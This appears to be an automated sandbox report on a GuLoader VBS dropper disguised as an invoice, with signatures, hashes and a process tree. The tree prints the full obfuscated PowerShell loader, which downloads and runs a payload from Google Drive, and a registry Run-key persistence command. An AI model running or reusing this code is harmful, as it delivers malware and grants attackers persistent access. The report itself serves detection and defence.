Analysis
-
max time kernel
121s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
-
submitted
21/02/2024, 13:11
General
-
Target
Faktúra PMC 180222SK24 & #160222SK71.vbs
-
Size
9KB
-
MD5
c274599f81b62b991e411bfc33a61452
-
SHA1
fc82a711944cf2d8928ebefca07686901c39b9b2
-
SHA256
f26dc7069c57ff58f49105f7b6df0e9e467bde973a9eac5f5abc75511f83a825
-
SHA512
c5627bd8f9230099d2b5255c43e5e80e81d1dcce65e64f61f4250ec27a5db17eb341f3ba8221aa268c6f9cbc9c2b49d6d06d1762967a0e77dbc95e519520f961
-
SSDEEP
192:JtgQv8hyRUSN1dXbZj2nst2DhkVWfk3y6aRYlKoQgMWXcMJN:vnv8Mh1dXIsuk0Gy6aR7XWXcW
Score
10/10
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 21 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Faktúra PMC 180222SK24 & #160222SK71.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Lysaare='Recipr:\Futiliz';Set-Content $Lysaare 'Krick';$Tommels=Test-Path $Lysaare;if($Tommels){exit};function Accommodab9 ($Vrisse){For($Opslutni=4; $Opslutni -lt $Vrisse.Length-1; $Opslutni+=5){$Pister=$Pister+$Vrisse.'Substring'($Opslutni, 1)};$Pister;}$Unvent=Accommodab9 'antehVanetLaketpigepSigbsSeri:Adon/Sags/protd fyrrHetei frivFutue Fje.Biphg halo BefoPrecg danl aaseOrth.Corpc OveoUnsumunte/KolbubillcMime? CapeForkxEftep Uddo UncrSupetDeco=PeppdEtymoAuxiw MisnImbelStamoGypsaBesldTing& Uniiformd Sub= Unc1 Non2PalatBandYFyldKNedrPInfr6EgilLSatuO Rad2BestpNejsXMemb5 OtiRStamXAttedIncrS ConvItal3CathuStyrcefteF Mag9ChamnKaraZTrisVTrvloBelim JakDUdva5 ModOLaurd pom7Sama ';$Pister01=Accommodab9 'Latei SeieOmegxPris ';$Appletstue = Accommodab9 ' Afs\SabesPriny RonsOpdawBetio DekwOmgj6Dipl4Joro\ IndWIrreiGastnCompdAutooLaasw VissEvanP SpeoBeblw Pede FolrTheiS ProhunrieVisil Timl Lng\Aposv Boo1 Pen.Sepa0Musi\Chasp CrioEnanwBrneeSiturEklisAuthhMandeDrenl Uprl For. KaleFormxkonsealmu ';&($Pister01) (Accommodab9 'Hear$heriRAllueArbecinteiGrewpNougr Acc2Unde=Seri$ZooseTrannArbevArch:ScenwHippi KarnOverdNibei UdlrMarb ') ;&($Pister01) (Accommodab9 'Recu$GensATaglp Ovep HaalDesteSmaatFagosSalvtEarhu StieKokk= Uns$PuerRTemieStaac BayiUdfopDirerDisk2 Skr+Tour$HaabALovmpArkipethilyarbeSupet FifsTilltPantuTypeeChol ') ;&($Pister01) (Accommodab9 'Jger$BuntaUnfrr GrntunluiMegalUdbalFors Conc=Brnd Cras(Haar(Sumpg Impw KatmTouriFres Ejerw GruiIdennolym3Leuc2Hagg_PlappBeskrSlamo KvacKookeeluts MagsDebu Ant-ErigFUdlb OpsoP Chir SquoDucecTyveeDisssAlfosTotaIExamdThur= Pro$Glaz{baigPLudeIForeDFort}Rava)Mrke.esprCTryko VenmTropm BomaStrin TotdShalL Occi casnKvajeRipp)cycl Chon-KanasSkafpSkaml SkoiInextSkra Trou[DishcOarihScria Loarnedr]Sprj3kata4bris ');&($Pister01) (Accommodab9 'Over$GenoSBegapSamgoCapcrUnarv ShieJacojSpagsKont Sna=Unco Kult$RetiaSelvrVitit NoaiOverlEcstlStaf[Flam$ expaTredrHebrtChani UdklBombl Bes.Gitoc SteointeuImminRudetTran-Bluf2Dobb]Unpu ');&($Pister01) (Accommodab9 ' Lng$ArbeMOmbraTrykr Revg Evaische=Forh(BrynTUnsueEndosAnelt Mud-TeutPSiphaKladtPreihasyl Leth$DemoAPistpKassp Sepl ForeGermtTretsMicrt AduudomeeOgen)Bath Diop-TillAOvernBaptdFags Gene(Coen[ForsIInexnWhattjyttP NontAkkorindf] Sko:kseb:CorrsOptaiRkerzBuddeLati Nays-RadieKejsqEnke Stau8Isog)gard ') ;if ($Margi) {&$Appletstue $Sporvejs;} else {;$Pister00=Accommodab9 'NonsSudstt PoeaTrumrDesctBesp-CocrBSpumi MestIteasStokTFundrAppoaVitrnKontsRaynfAnureInvorDepe Drej-KiltS Aero ReduKeybrSjlecPredeRemi Reda$StepU Iron UmuvLysieHetenUldetStor Tra- GraDPleneChorsNatbtTraviSlannIntuaMorptisomi NesoSekunSejl Nova$ OrtRManneUnascCilai Pitp blarModa2Diph ';&($Pister01) (Accommodab9 'Achi$FredRVordeSymmcAlmiiLevepinderUrta2Dive=Leje$LedseMercnLedivStor:Bulba SempHrbapFritdpaupaKimotAmpha una ') ;&($Pister01) (Accommodab9 'UnneISydsmOkkepKvlloForbrUnhut Bea-KamiMYounoTracdFlesugtehlRealeNonr SeniBGnaviLovet buzsNettTSivnrAbsoaJndmnVikasFormfUndeeEpidrLder ') ;$Recipr2=$Recipr2+'\Reagicrhe.Rut';while (-not $Laasemeka) {&($Pister01) (Accommodab9 ' Din$ EksLudviaAnekaFreds ChaeImpam AnteVejgkleasaTint= Sno(SpriT Stre JossArbetDith-ressPAfreaAttrtcisthWell Bast$SlhuRharmeantacKnipiTruspFrigrSomn2Wess) Unf ') ;&($Pister01) $Pister00;&($Pister01) (Accommodab9 'UnstSChint DilaDentr EnctPhil-TidsSLrealUngle GlueNavepOrdb Bese5Glit ');}&($Pister01) (Accommodab9 'alky$EmboAMinicForscAfhjo ThemKronmStenoPanndFortascrabAcro For=Fors GalaGBrioeBarntnonv-SubcCImpuo DisnVejstSangeSparnKonttSoot Glas$EyebR PleePermcAdrei AnnpGnavrPedo2Bran ');&($Pister01) (Accommodab9 'Cate$UnfeSBladvEggpaTripmLagepParteMangk DagoInds Cumu=Squi Ungi[ borSStvryMuntsMiratHilseUnpam Gly.SammCOrieo BevnChamvUngde BevrNonstVold]Eliq:Seks:CharFOverrBidsoPalimLeafBFlleaSweesTreneSill6rsti4SletSNyret Forr hypi LegnSeorgFlin(Hast$FremABlodcPsyccSprooCachmPambm KlroAfled UncaVenebPlis)Slge ');&($Pister01) (Accommodab9 'Ceto$CellP TraiMexisXerotOffeeNontrMagn2Club Nyin=Disa Sand[ImusS UntyStres PoltStikeTuftmRica.StyrTvkkeeDespxUdsmt Taa.AlfaEUdskn JakcIneaoteeldgrioilordnHandgLeis]Unnu:fors: BriA IntSUnexCFingIDydsIOmga. AsyGIndheKorttSdebSSlastOverrCeltiemulnBoilgNonc(Cath$LizaSOvervOrgaaTrykmfrikpDepoeGrankTongolill)cont ');&($Pister01) (Accommodab9 ' Par$BortwSprohFodsiGenigslav= The$RokePCompiDevesTekstEroteKassrWild2 Til.BversGeneuLegebOversvolutSkilrAnegi CrynNitrg Whe(Pseu3Juan1Reds9 Bur6 Udb6acan1Last, Kde2 Ost7gran6 Lib5Marq7Renl)Skam ');&($Pister01) $whig;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Lysaare='Recipr:\Futiliz';Set-Content $Lysaare 'Krick';$Tommels=Test-Path $Lysaare;if($Tommels){exit};function Accommodab9 ($Vrisse){For($Opslutni=4; $Opslutni -lt $Vrisse.Length-1; $Opslutni+=5){$Pister=$Pister+$Vrisse.'Substring'($Opslutni, 1)};$Pister;}$Unvent=Accommodab9 'antehVanetLaketpigepSigbsSeri:Adon/Sags/protd fyrrHetei frivFutue Fje.Biphg halo BefoPrecg danl aaseOrth.Corpc OveoUnsumunte/KolbubillcMime? CapeForkxEftep Uddo UncrSupetDeco=PeppdEtymoAuxiw MisnImbelStamoGypsaBesldTing& Uniiformd Sub= Unc1 Non2PalatBandYFyldKNedrPInfr6EgilLSatuO Rad2BestpNejsXMemb5 OtiRStamXAttedIncrS ConvItal3CathuStyrcefteF Mag9ChamnKaraZTrisVTrvloBelim JakDUdva5 ModOLaurd pom7Sama ';$Pister01=Accommodab9 'Latei SeieOmegxPris ';$Appletstue = Accommodab9 ' Afs\SabesPriny RonsOpdawBetio DekwOmgj6Dipl4Joro\ IndWIrreiGastnCompdAutooLaasw VissEvanP SpeoBeblw Pede FolrTheiS ProhunrieVisil Timl Lng\Aposv Boo1 Pen.Sepa0Musi\Chasp CrioEnanwBrneeSiturEklisAuthhMandeDrenl Uprl For. KaleFormxkonsealmu ';&($Pister01) (Accommodab9 'Hear$heriRAllueArbecinteiGrewpNougr Acc2Unde=Seri$ZooseTrannArbevArch:ScenwHippi KarnOverdNibei UdlrMarb ') ;&($Pister01) (Accommodab9 'Recu$GensATaglp Ovep HaalDesteSmaatFagosSalvtEarhu StieKokk= Uns$PuerRTemieStaac BayiUdfopDirerDisk2 Skr+Tour$HaabALovmpArkipethilyarbeSupet FifsTilltPantuTypeeChol ') ;&($Pister01) (Accommodab9 'Jger$BuntaUnfrr GrntunluiMegalUdbalFors Conc=Brnd Cras(Haar(Sumpg Impw KatmTouriFres Ejerw GruiIdennolym3Leuc2Hagg_PlappBeskrSlamo KvacKookeeluts MagsDebu Ant-ErigFUdlb OpsoP Chir SquoDucecTyveeDisssAlfosTotaIExamdThur= Pro$Glaz{baigPLudeIForeDFort}Rava)Mrke.esprCTryko VenmTropm BomaStrin TotdShalL Occi casnKvajeRipp)cycl Chon-KanasSkafpSkaml SkoiInextSkra Trou[DishcOarihScria Loarnedr]Sprj3kata4bris ');&($Pister01) (Accommodab9 'Over$GenoSBegapSamgoCapcrUnarv ShieJacojSpagsKont Sna=Unco Kult$RetiaSelvrVitit NoaiOverlEcstlStaf[Flam$ expaTredrHebrtChani UdklBombl Bes.Gitoc SteointeuImminRudetTran-Bluf2Dobb]Unpu ');&($Pister01) (Accommodab9 ' Lng$ArbeMOmbraTrykr Revg Evaische=Forh(BrynTUnsueEndosAnelt Mud-TeutPSiphaKladtPreihasyl Leth$DemoAPistpKassp Sepl ForeGermtTretsMicrt AduudomeeOgen)Bath Diop-TillAOvernBaptdFags Gene(Coen[ForsIInexnWhattjyttP NontAkkorindf] Sko:kseb:CorrsOptaiRkerzBuddeLati Nays-RadieKejsqEnke Stau8Isog)gard ') ;if ($Margi) {&$Appletstue $Sporvejs;} else {;$Pister00=Accommodab9 'NonsSudstt PoeaTrumrDesctBesp-CocrBSpumi MestIteasStokTFundrAppoaVitrnKontsRaynfAnureInvorDepe Drej-KiltS Aero ReduKeybrSjlecPredeRemi Reda$StepU Iron UmuvLysieHetenUldetStor Tra- GraDPleneChorsNatbtTraviSlannIntuaMorptisomi NesoSekunSejl Nova$ OrtRManneUnascCilai Pitp blarModa2Diph ';&($Pister01) (Accommodab9 'Achi$FredRVordeSymmcAlmiiLevepinderUrta2Dive=Leje$LedseMercnLedivStor:Bulba SempHrbapFritdpaupaKimotAmpha una ') ;&($Pister01) (Accommodab9 'UnneISydsmOkkepKvlloForbrUnhut Bea-KamiMYounoTracdFlesugtehlRealeNonr SeniBGnaviLovet buzsNettTSivnrAbsoaJndmnVikasFormfUndeeEpidrLder ') ;$Recipr2=$Recipr2+'\Reagicrhe.Rut';while (-not $Laasemeka) {&($Pister01) (Accommodab9 ' Din$ EksLudviaAnekaFreds ChaeImpam AnteVejgkleasaTint= Sno(SpriT Stre JossArbetDith-ressPAfreaAttrtcisthWell Bast$SlhuRharmeantacKnipiTruspFrigrSomn2Wess) Unf ') ;&($Pister01) $Pister00;&($Pister01) (Accommodab9 'UnstSChint DilaDentr EnctPhil-TidsSLrealUngle GlueNavepOrdb Bese5Glit ');}&($Pister01) (Accommodab9 'alky$EmboAMinicForscAfhjo ThemKronmStenoPanndFortascrabAcro For=Fors GalaGBrioeBarntnonv-SubcCImpuo DisnVejstSangeSparnKonttSoot Glas$EyebR PleePermcAdrei AnnpGnavrPedo2Bran ');&($Pister01) (Accommodab9 'Cate$UnfeSBladvEggpaTripmLagepParteMangk DagoInds Cumu=Squi Ungi[ borSStvryMuntsMiratHilseUnpam Gly.SammCOrieo BevnChamvUngde BevrNonstVold]Eliq:Seks:CharFOverrBidsoPalimLeafBFlleaSweesTreneSill6rsti4SletSNyret Forr hypi LegnSeorgFlin(Hast$FremABlodcPsyccSprooCachmPambm KlroAfled UncaVenebPlis)Slge ');&($Pister01) (Accommodab9 'Ceto$CellP TraiMexisXerotOffeeNontrMagn2Club Nyin=Disa Sand[ImusS UntyStres PoltStikeTuftmRica.StyrTvkkeeDespxUdsmt Taa.AlfaEUdskn JakcIneaoteeldgrioilordnHandgLeis]Unnu:fors: BriA IntSUnexCFingIDydsIOmga. AsyGIndheKorttSdebSSlastOverrCeltiemulnBoilgNonc(Cath$LizaSOvervOrgaaTrykmfrikpDepoeGrankTongolill)cont ');&($Pister01) (Accommodab9 ' Par$BortwSprohFodsiGenigslav= The$RokePCompiDevesTekstEroteKassrWild2 Til.BversGeneuLegebOversvolutSkilrAnegi CrynNitrg Whe(Pseu3Juan1Reds9 Bur6 Udb6acan1Last, Kde2 Ost7gran6 Lib5Marq7Renl)Skam ');&($Pister01) $whig;}"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Fore% -w 1 $Bintjeka=(Get-ItemProperty -Path 'HKCU:\Iridoto\').Whicks;%Fore% ($Bintjeka)"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Fore% -w 1 $Bintjeka=(Get-ItemProperty -Path 'HKCU:\Iridoto\').Whicks;%Fore% ($Bintjeka)"6⤵
- Adds Run key to start application
- Modifies registry key
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
344B
MD5e55c45386be827dda9bee7ffab6fc1fb
SHA145740f43bc84bd2cd39c2684bd1eaf07c5e89082
SHA25651b4d9d5291f54afd6554f78753b9572e7030498663ee1df381863b5a01c8184
SHA51221e28e7a0259ce4f2917320ec661ca272ae84f36afa5dde563681ab3bab454a12c737b2238d02bc8cf8cd3c87a5c5e3e84bcb2180ec9ab1320eb17e2734e6463
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
7KB
MD5799e73242120f74f804255d5619585c6
SHA1513b0519d3e0086337653546ea8a0964a36c8ada
SHA25603f613e23671e9df45bbbff7c58e563576c334cfa1d73766227e3b67171f8181
SHA512882efb5af566fc7da6e8109761bb755310952c8487738068b04941a21760e617a709d5fe15ab5dbfa40da9bddf7918c4ec19af0458aa7346e041d197b6698db4
-
Filesize
19.5MB
-
Filesize
19.5MB
-
Filesize
856KB
-
Filesize
16.4MB
-
Filesize
856KB
-
Filesize
4KB
-
Filesize
1.7MB
-
Filesize
256KB
-
Filesize
856KB
-
Filesize
19.5MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
19.5MB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
4KB
-
Filesize
19.5MB
-
Filesize
256KB
-
Filesize
19.5MB
-
Filesize
1.7MB
-
Filesize
256KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
2.9MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
9.6MB